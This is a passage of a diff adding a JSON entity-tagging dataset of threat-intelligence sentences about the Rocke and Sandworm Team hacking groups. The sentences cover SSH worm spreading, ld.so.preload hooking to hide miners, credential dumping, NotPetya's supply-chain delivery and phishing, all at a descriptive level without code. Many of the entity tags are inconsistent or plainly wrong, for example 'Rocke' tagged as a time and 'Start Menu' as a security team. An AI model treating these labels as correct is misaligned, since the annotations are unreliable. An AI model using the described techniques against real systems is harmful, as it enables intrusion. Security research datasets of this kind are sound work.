+ ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "used", + "SSH", + "private", + "keys", + "on", + "the", + "infected", + "machine", + "to", + "spread", + "its", + "coinminer", + "throughout", + "a", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "can", + "detect", + "a", + "running", + "process's", + "PID", + "on", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "used", + "Python-based", + "malware", + "to", + "install", + "and", + "spread", + "their", + "coinminer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke's", + "miner", + "has", + "created", + "UPX-packed", + "files", + "in", + "the", + "Windows", + "Start", + "Menu", + "Folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "B-SecTeam", + "B-Tool" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "looked", + "for", + "IP", + "addresses", + "in", + "the", + "known_hosts", + "file", + "on", + "the", + "infected", + "system", + "and", + "attempted", + "to", + "SSH", + "into", + "them." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "distributed", + "cryptomining", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "modified", + "/etc/ld.so.preload", + "to", + "hook", + "libc", + "functions", + "in", + "order", + "to", + "hide", + "the", + "installed", + "dropper", + "and", + "mining", + "software", + "in", + "process", + "lists." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "spread", + "its", + "coinminer", + "via", + "SSH." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rocke", + "used", + "scripts", + "which", + "detected", + "and", + "uninstalled", + "antivirus", + "software." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke's", + "miner", + "has", + "created", + "UPX-packed", + "files", + "in", + "the", + "Windows", + "Start", + "Menu", + "Folder." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "B-SecTeam", + "B-Tool" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "used", + "uname", + "-m", + "to", + "collect", + "the", + "name", + "and", + "information", + "about", + "the", + "infected", + "system's", + "kernel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "installed", + "a", + "systemd", + "service", + "script", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "changed", + "the", + "time", + "stamp", + "of", + "certain", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "used", + "shell", + "scripts", + "to", + "run", + "commands", + "which", + "would", + "obtain", + "persistence", + "and", + "execute", + "the", + "cryptocurrency", + "mining", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "executed", + "wget", + "and", + "curl", + "commands", + "to", + "Pastebin", + "over", + "the", + "HTTPS", + "protocol." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Rocke", + "has", + "used", + "Pastebin,", + "Gitee,", + "and", + "GitLab", + "for", + "Command", + "and", + "Control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "used", + "various", + "third-party", + "email", + "campaign", + "management", + "services", + "to", + "deliver", + "phishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "the", + "Telegram", + "Bot", + "API", + "from", + "Telegram", + "Messenger", + "to", + "send", + "and", + "receive", + "commands", + "to", + "its", + "Python", + "backdoor.", + "Sandworm", + "Team", + "also", + "used", + "legitimate", + "M.E.Doc", + "software", + "update", + "check", + "requests", + "for", + "sending", + "and", + "receiving", + "commands", + "and", + "hosted", + "malicious", + "payloads", + "on", + "putdrive.com." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "a", + "large-scale", + "botnet", + "to", + "target", + "Small", + "Office/Home", + "Office", + "(SOHO)", + "network", + "devices." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Org", + "O", + "I-Org", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "In", + "preparation", + "for", + "its", + "attack", + "against", + "the", + "2018", + "Winter", + "Olympics,", + "Sandworm", + "Team", + "conducted", + "online", + "research", + "of", + "partner", + "organizations", + "listed", + "on", + "an", + "official", + "PyeongChang", + "Olympics", + "partnership", + "site." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "I-Area", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "ROT13", + "encoding,", + "AES", + "encryption", + "and", + "compression", + "with", + "the", + "zlib", + "library", + "for", + "their", + "Python-based", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "distributed", + "NotPetya", + "by", + "compromising", + "the", + "legitimate", + "Ukrainian", + "accounting", + "software", + "M.E.Doc", + "and", + "replacing", + "a", + "legitimate", + "software", + "update", + "with", + "a", + "malicious", + "one." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team's", + "CredRaptor", + "tool", + "can", + "collect", + "saved", + "passwords", + "from", + "various", + "internet", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "the", + "BlackEnergy", + "KillDisk", + "component", + "to", + "overwrite", + "files", + "on", + "Windows-based", + "Human-Machine", + "Interfaces." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "Prestige", + "ransomware", + "to", + "encrypt", + "data", + "at", + "targeted", + "organizations", + "in", + "transportation", + "and", + "related", + "logistics", + "industries", + "in", + "Ukraine", + "and", + "Poland." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "B-Area", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "exfiltrates", + "data", + "of", + "interest", + "from", + "enterprise", + "databases", + "using", + "Adminer." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "exfiltrated", + "internal", + "documents,", + "files,", + "and", + "other", + "data", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team's", + "VBS", + "backdoor", + "can", + "decode", + "Base64-encoded", + "data", + "and", + "save", + "it", + "to", + "the", + "%TEMP%", + "folder.", + "The", + "group", + "also", + "decrypted", + "received", + "information", + "using", + "the", + "Triple", + "DES", + "algorithm", + "and", + "decompresses", + "it", + "using", + "GZip." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "the", + "BlackEnergy", + "KillDisk", + "component", + "to", + "corrupt", + "the", + "infected", + "system's", + "master", + "boot", + "record." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "a", + "tool", + "to", + "query", + "Active", + "Directory", + "using", + "LDAP,", + "discovering", + "information", + "about", + "usernames", + "listed", + "in", + "AD." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "stolen", + "credentials", + "to", + "access", + "administrative", + "accounts", + "within", + "the", + "domain." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "conducted", + "technical", + "reconnaissance", + "of", + "the", + "Parliament", + "of", + "Georgia's", + "official", + "internet", + "domain", + "prior", + "to", + "its", + "2019", + "attack." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-OffAct" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "registered", + "domain", + "names", + "and", + "created", + "URLs", + "that", + "are", + "often", + "designed", + "to", + "mimic", + "or", + "spoof", + "legitimate", + "websites,", + "such", + "as", + "email", + "login", + "pages,", + "online", + "file", + "sharing", + "and", + "storage", + "websites,", + "and", + "password", + "reset", + "pages,", + "while", + "also", + "hosting", + "these", + "items", + "on", + "legitimate,", + "compromised", + "network", + "infrastructure." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "used", + "malware", + "to", + "enumerate", + "email", + "settings,", + "including", + "usernames", + "and", + "passwords,", + "from", + "the", + "M.E.Doc", + "application." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "created", + "email", + "accounts", + "that", + "mimic", + "legitimate", + "organizations", + "for", + "its", + "spearphishing", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "obtained", + "valid", + "emails", + "addresses", + "while", + "conducting", + "research", + "against", + "target", + "organizations", + "that", + "were", + "subsequently", + "used", + "in", + "spearphishing", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "Sandworm", + "Team's", + "research", + "of", + "potential", + "victim", + "organizations", + "included", + "the", + "identification", + "and", + "collection", + "of", + "employee", + "information." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "temporarily", + "disrupted", + "service", + "to", + "Georgian", + "government,", + "non-government,", + "and", + "private", + "sector", + "websites", + "after", + "compromising", + "a", + "Georgian", + "web", + "hosting", + "provider", + "in", + "2019." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Area", + "B-Idus", + "B-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "sent", + "system", + "information", + "to", + "its", + "C2", + "server", + "using", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "exploits", + "public-facing", + "applications", + "for", + "initial", + "access", + "and", + "to", + "acquire", + "infrastructure,", + "such", + "as", + "exploitation", + "of", + "the", + "EXIM", + "mail", + "transfer", + "agent", + "in", + "Linux", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "exploited", + "vulnerabilities", + "in", + "Microsoft", + "PowerPoint", + "via", + "OLE", + "objects", + "(CVE-2014-4114)", + "and", + "Microsoft", + "Word", + "via", + "crafted", + "TIFF", + "images", + "(CVE-2013-3906)." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "defaced", + "approximately", + "15,000", + "websites", + "belonging", + "to", + "Georgian", + "government,", + "non-government,", + "and", + "private", + "sector", + "organizations", + "in", + "2019." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-Idus", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Time" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "Dropbear", + "SSH", + "with", + "a", + "hardcoded", + "backdoor", + "password", + "to", + "maintain", + "persistence", + "within", + "the", + "target", + "network.", + "Sandworm", + "Team", + "has", + "also", + "used", + "VPN", + "tunnels", + "established", + "in", + "legitimate", + "software", + "company", + "infrastructure", + "to", + "gain", + "access", + "to", + "internal", + "networks", + "of", + "that", + "software", + "company's", + "users." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Tool", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "backdoors", + "that", + "can", + "delete", + "files", + "used", + "in", + "an", + "attack", + "from", + "an", + "infected", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "enumerated", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "pushed", + "additional", + "malicious", + "tools", + "onto", + "an", + "infected", + "system", + "to", + "steal", + "user", + "credentials,", + "move", + "laterally,", + "and", + "destroy", + "data." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "B-Purp", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "a", + "keylogger", + "to", + "capture", + "keystrokes", + "by", + "using", + "the", + "SetWindowsHookEx", + "function." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "its", + "plainpwd", + "tool,", + "a", + "modified", + "version", + "of", + "Mimikatz,", + "and", + "comsvcs.dll", + "to", + "dump", + "Windows", + "credentials", + "from", + "system", + "memory." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "`move`", + "to", + "transfer", + "files", + "to", + "a", + "network", + "share", + "and", + "has", + "copied", + "payloads--such", + "as", + "Prestige", + "ransomware--to", + "an", + "Active", + "Directory", + "Domain", + "Controller", + "and", + "distributed", + "via", + "the", + "Default", + "Domain", + "Group", + "Policy", + "Object." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "tricked", + "unwitting", + "recipients", + "into", + "clicking", + "on", + "spearphishing", + "attachments", + "and", + "enabling", + "malicious", + "macros", + "embedded", + "within", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "tricked", + "unwitting", + "recipients", + "into", + "clicking", + "on", + "malicious", + "hyperlinks", + "within", + "emails", + "crafted", + "to", + "resemble", + "trustworthy", + "senders." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "developed", + "malware", + "for", + "its", + "operations,", + "including", + "malicious", + "mobile", + "applications", + "and", + "destructive", + "malware", + "such", + "as", + "NotPetya", + "and", + "Olympic", + "Destroyer." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "masqueraded", + "malicious", + "installers", + "as", + "Windows", + "update", + "packages", + "to", + "evade", + "defense", + "and", + "entice", + "users", + "to", + "execute", + "binaries." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "avoided", + "detection", + "by", + "naming", + "a", + "malicious", + "binary", + "explorer.exe." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "`ntdsutil.exe`", + "to", + "back", + "up", + "the", + "Active", + "Directory", + "database,", + "likely", + "for", + "credential", + "access." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "intercepter-NG", + "to", + "sniff", + "passwords", + "in", + "network", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "port", + "6789", + "to", + "accept", + "connections", + "on", + "the", + "group's", + "SSH", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "Base64", + "encoding", + "within", + "malware", + "variants." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "PowerShell", + "scripts", + "to", + "run", + "a", + "credential", + "harvesting", + "tool", + "in", + "memory", + "to", + "evade", + "defenses." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team's", + "BCS-server", + "tool", + "can", + "create", + "an", + "internal", + "proxy", + "server", + "to", + "redirect", + "traffic", + "from", + "the", + "adversary-controlled", + "C2", + "to", + "internal", + "servers", + "which", + "may", + "not", + "be", + "connected", + "to", + "the", + "internet,", + "but", + "are", + "interconnected", + "locally." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "remote", + "administration", + "tools", + "or", + "remote", + "industrial", + "control", + "system", + "client", + "software", + "for", + "execution", + "and", + "to", + "maliciously", + "release", + "electricity", + "breakers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "used", + "a", + "tool", + "to", + "query", + "Active", + "Directory", + "using", + "LDAP,", + "discovering", + "information", + "about", + "computers", + "listed", + "in", + "AD." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "used", + "a", + "backdoor", + "which", + "could", + "execute", + "a", + "supplied", + "DLL", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "copied", + "payloads", + "to", + "the", + "`ADMIN$`", + "share", + "of", + "remote", + "systems", + "and", + "run", + "<code>net", + "use</code>", + "to", + "connect", + "to", + "network", + "shares." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "researched", + "Ukraine's", + "unique", + "legal", + "entity", + "identifier", + "(called", + "an", + "\"EDRPOU\"", + "number),", + "including", + "running", + "queries", + "on", + "the", + "EDRPOU", + "website,", + "in", + "preparation", + "for", + "the", + "NotPetya", + "attack.", + "Sandworm", + "Team", + "has", + "also", + "researched", + "third-party", + "websites", + "to", + "help", + "it", + "craft", + "credible", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "conducted", + "research", + "against", + "potential", + "victim", + "websites", + "as", + "part", + "of", + "its", + "operational", + "planning." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "leased", + "servers", + "from", + "resellers", + "instead", + "of", + "leasing", + "infrastructure", + "directly", + "from", + "hosting", + "companies", + "to", + "enable", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "compromised", + "legitimate", + "Linux", + "servers", + "running", + "the", + "EXIM", + "mail", + "transfer", + "agent", + "for", + "use", + "in", + "subsequent", + "campaigns." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "creates", + "credential", + "capture", + "webpages", + "to", + "compromise", + "existing,", + "legitimate", + "social", + "media", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "I-Idus", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "established", + "social", + "media", + "accounts", + "to", + "disseminate", + "victim", + "internal-only", + "documents", + "and", + "other", + "sensitive", + "data." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sandworm", + "Team", + "has", + "researched", + "software", + "code", + "to", + "enable", + "supply-chain", + "operations,", + "most", + "notably", + "for", + "the", + "2017", + "NotPetya", + "attack.", + "Sandworm", + "Team", + "also", + "collected", + "a", + "list", + "of", + 